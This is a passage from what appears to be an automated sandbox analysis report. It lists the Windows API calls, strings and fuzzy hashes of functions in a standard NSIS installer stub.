                                                                                  • Part of subcall function 00405AD6: GetFileAttributesA.KERNEL32(00000003,00402CF9,0042AC00,80000000,00000003), ref: 00405ADA
                                                                                  • Part of subcall function 00405AD6: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402D2F
                                                                                • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402E76
                                                                                Strings
                                                                                • Null, xrefs: 00402DAF
                                                                                • soft, xrefs: 00402DA6
                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402EBF
                                                                                • Error launching installer, xrefs: 00402D06
                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F0D
                                                                                • Inst, xrefs: 00402D9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                • API String ID: 2803837635-3016655952
                                                                                • Opcode ID: 6949a2dc81abe6ae8ca3848ee1a274e905e25326872c2b53de3725809208b6fc
                                                                                • Instruction ID: 6560279c47655c84bfe4d90bfb6f1ef804bba6314c77a30d8371cd5976d9e3e8
                                                                                • Opcode Fuzzy Hash: 6949a2dc81abe6ae8ca3848ee1a274e905e25326872c2b53de3725809208b6fc
                                                                                • Instruction Fuzzy Hash: C66103B1A40215ABDB20AF60DE89B9E77B8EB04354F51413BF501B72D1D7BC9E818B9C
                                                                                Function 00405E85 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,0041F510,00000000,004050B4,0041F510,00000000), ref: 00405F36
                                                                                • GetSystemDirectoryA.KERNEL32(004226C0,00000400), ref: 00405FB1
                                                                                • GetWindowsDirectoryA.KERNEL32(004226C0,00000400), ref: 00405FC4
                                                                                • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406000
                                                                                • SHGetPathFromIDListA.SHELL32(00000000,004226C0), ref: 0040600E
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00406019
                                                                                • lstrcatA.KERNEL32(004226C0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040603B
                                                                                • lstrlenA.KERNEL32(004226C0,?,0041F510,00000000,004050B4,0041F510,00000000), ref: 0040608D
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F80
                                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406035
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                • API String ID: 900638850-730719616
                                                                                • Opcode ID: ecdefe2751fc2be78af5e26724b3c6b53ae81c07b092af95d9830a7abdf9c2ab
                                                                                • Instruction ID: a8b5a8e5c19b1295dd56f0f1fbd515d1e85c9865fba9c5a77ffde0f73355f29a
                                                                                • Opcode Fuzzy Hash: ecdefe2751fc2be78af5e26724b3c6b53ae81c07b092af95d9830a7abdf9c2ab
                                                                                • Instruction Fuzzy Hash: DE6123B1A40502ABDF219F24CC84BBB3BB4DB45354F15813BE902B62D1D37D4952DB5E
                                                                                Function 004040AF Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000EB), ref: 004040CC
                                                                                • GetSysColor.USER32(00000000), ref: 004040E8
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004040F4
                                                                                • SetBkMode.GDI32(?,?), ref: 00404100
                                                                                • GetSysColor.USER32(?), ref: 00404113
                                                                                • SetBkColor.GDI32(?,?), ref: 00404123
                                                                                • DeleteObject.GDI32(?), ref: 0040413D
                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404147
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2320649405-0
                                                                                • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                • Instruction ID: b9626d203e07c142b7df78836af29c525e1d4ad6db78ea87979aa0b8fd7aa94c
                                                                                • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                • Instruction Fuzzy Hash: 9C219671904704ABC7219F78DD48B4BBBF8AF41714F048529E996F63E0D734E944CB55
                                                                                Function 0040507C Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                • lstrlenA.KERNEL32(00402C8E,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                • lstrcatA.KERNEL32(0041F510,00402C8E,00402C8E,0041F510,00000000,00000000,00000000), ref: 004050D8
                                                                                • SetWindowTextA.USER32(0041F510,0041F510), ref: 004050EA
                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2531174081-0
                                                                                • Opcode ID: 5079ce61eb60a58f18aa72498b661a7186dcc34ecfe9b72952c752fd8c1df286
                                                                                • Instruction ID: 0932fbc12a6b25bcac4b474ac1e4098b180b1803f9783341f4c7184ef00e87b2
                                                                                • Opcode Fuzzy Hash: 5079ce61eb60a58f18aa72498b661a7186dcc34ecfe9b72952c752fd8c1df286
                                                                                • Instruction Fuzzy Hash: 7E218C71E00508BADF119FA5CD84EDFBFA9EF04358F14807AF944A6291C7789A41CFA8
                                                                                Function 00402C17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,00000000), ref: 00402C2F
                                                                                • GetTickCount.KERNEL32 ref: 00402C4D
                                                                                • wsprintfA.USER32 ref: 00402C7B
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(0041F510,00402C8E,00402C8E,0041F510,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(0041F510,0041F510), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C9F
                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402CAD
                                                                                  • Part of subcall function 00402BFB: MulDiv.KERNEL32(?,00000064,?), ref: 00402C10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                • String ID: ... %d%%
                                                                                • API String ID: 722711167-2449383134
                                                                                • Opcode ID: 7d0623a2cd468cac031d423fca67306a5c295f184f42190a876200fb63a7e503
                                                                                • Instruction ID: 50736a5f322e453d47399e53c3729a9749aec8e4ed59b6a4d84230157c1bc9e9
                                                                                • Opcode Fuzzy Hash: 7d0623a2cd468cac031d423fca67306a5c295f184f42190a876200fb63a7e503
                                                                                • Instruction Fuzzy Hash: 400161B090A624EBEB21AF64EF0DD9F7768EB04701B444177F405B11E4D6B89942C69E
                                                                                Function 00404947 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404962
                                                                                • GetMessagePos.USER32 ref: 0040496A
                                                                                • ScreenToClient.USER32(?,?), ref: 00404984
                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404996
                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049BC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Message$Send$ClientScreen
                                                                                • String ID: f
                                                                                • API String ID: 41195575-1993550816
                                                                                • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                • Instruction ID: 9a5aaf7a7a2eb46524cfe6ed05727662581176125bc7a9594c14671d6fd5834d
                                                                                • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                • Instruction Fuzzy Hash: D60152B1D00219BADB11DBA4DC45FFFBBBCAF55711F10416BBA10B61C0C7B869018BA5
                                                                                Function 00405542 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(?,?,0042A400), ref: 00405585
                                                                                • GetLastError.KERNEL32 ref: 00405599
                                                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055AE
                                                                                • GetLastError.KERNEL32 ref: 004055B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                • String ID: ds@$ts@
                                                                                • API String ID: 3449924974-968229870
                                                                                • Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                                                • Instruction ID: 9e56051543debb7748005a245647f72f9f0c442d478d44b0b7514676580bb89d
                                                                                • Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                                                • Instruction Fuzzy Hash: 2701E571D14259EAEF119BA0CD487EFBBB9EB04354F008176E905B6280D378A604CBAA
                                                                                Function 00402B7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                • wsprintfA.USER32 ref: 00402BCE
                                                                                • SetWindowTextA.USER32(?,?), ref: 00402BDE
                                                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                • API String ID: 1451636040-1158693248
                                                                                • Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                                                                • Instruction ID: 59ddb31903a36680b4224ad2704aa62d89b79b457576c75755388437ec856a92
                                                                                • Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                                                                • Instruction Fuzzy Hash: D5F01D70900208AAEF205F60DD0ABAE3779FB04345F00803AFA16B51D0D7B9AA559B59
                                                                                Function 0040618E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
                                                                                • wsprintfA.USER32 ref: 004061DE
                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004061F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                • String ID: %s%s.dll$UXTHEME$\
                                                                                • API String ID: 2200240437-4240819195
                                                                                • Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                                                • Instruction ID: 17d4186d305cf40b40e49104478d07e272734a7bb4b2e73e379b3f466295ecaf
                                                                                • Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                                                • Instruction Fuzzy Hash: D1F0FC3095410567DB159768DC0DFFF365CBB08304F140176A546E51D2D574E9288B69
                                                                                Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                • String ID:
                                                                                • API String ID: 2667972263-0
                                                                                • Opcode ID: dfbaa0a962ed5675632727b5aebdf70cb5937a5c531337a867a72187c03a1d98
                                                                                • Instruction ID: 485419aab899adaa45f09767fc84dfb68f9751acdadaf5e244b928a283e6c860
                                                                                • Opcode Fuzzy Hash: dfbaa0a962ed5675632727b5aebdf70cb5937a5c531337a867a72187c03a1d98
                                                                                • Instruction Fuzzy Hash: 0A21AE71800128BBCF116FA5CE89DAE7A79EF08364F10423AF921762D0C7795D018F98
                                                                                Function 004060CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,00429000,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406126
                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00406133
                                                                                • CharNextA.USER32(?,00429000,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406138
                                                                                • CharPrevA.USER32(?,?,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406148
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Char$Next$Prev
                                                                                • String ID: *?|<>/":
                                                                                • API String ID: 589700163-165019052
                                                                                • Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                                                • Instruction ID: f4547238e9b15f098583f6e7a29ad5d1a016b5704a22f35d65a3ab7f018ae362
                                                                                • Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                                                • Instruction Fuzzy Hash: EF1104A18043A22DFB3246284C44B77AF884F5A764F19407BE4C6763C3CA7C9C52866D
                                                                                Function 00401751 Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcatA.KERNEL32(00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 00401790
                                                                                • CompareFileTime.KERNEL32(-00000014,?,00409400,00409400,00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 004017BA
                                                                                  • Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(0041F510,00402C8E,00402C8E,0041F510,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(0041F510,0041F510), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 1941528284-0
                                                                                • Opcode ID: 6608a40cbad04134a8f8594ebb4ccf2e27175878a4a96e62a378f4abadff5d1a
                                                                                • Instruction ID: 7023b4eef350b7a4ada653e1e4d9b110c77c4e6d7f727d83c91ff2b2eb458513
                                                                                • Opcode Fuzzy Hash: 6608a40cbad04134a8f8594ebb4ccf2e27175878a4a96e62a378f4abadff5d1a
                                                                                • Instruction Fuzzy Hash: 3941C472A00514BACF107BB5CC85EAF3668EF45369B20863BF121B21E1D67C4A41CBAD
                                                                                Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Close$DeleteEnumOpen
                                                                                • String ID:
                                                                                • API String ID: 1912718029-0
                                                                                • Opcode ID: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                                                                • Instruction ID: 2c69578fec59b839bbbb6554d628e5ed2d7180fb0bd31e8d2d7d3181fb534eb1
                                                                                • Opcode Fuzzy Hash: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                                                                • Instruction Fuzzy Hash: 93113D71A00108BEDF229F90DE89DAA3B7DEB54349B504436F901F10A0D775AE51EB69
                                                                                Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                • String ID:
                                                                                • API String ID: 1849352358-0
                                                                                • Opcode ID: 60e0f0a4f4cd1fd9b22debf782eb0323395cc1f2f46e7b7788968bb6fcd6f90b
                                                                                • Instruction ID: 869b35d44be7719ac4f8667573c2d83536e062a508785c5670752e956bf1946f
                                                                                • Opcode Fuzzy Hash: 60e0f0a4f4cd1fd9b22debf782eb0323395cc1f2f46e7b7788968bb6fcd6f90b
                                                                                • Instruction Fuzzy Hash: 1BF0ECB2A04114AFEB01ABE4DD88DAFB7BDEB54305B104476F602F6191C7749D018B79
                                                                                Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(?), ref: 00401D3B
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                • String ID:
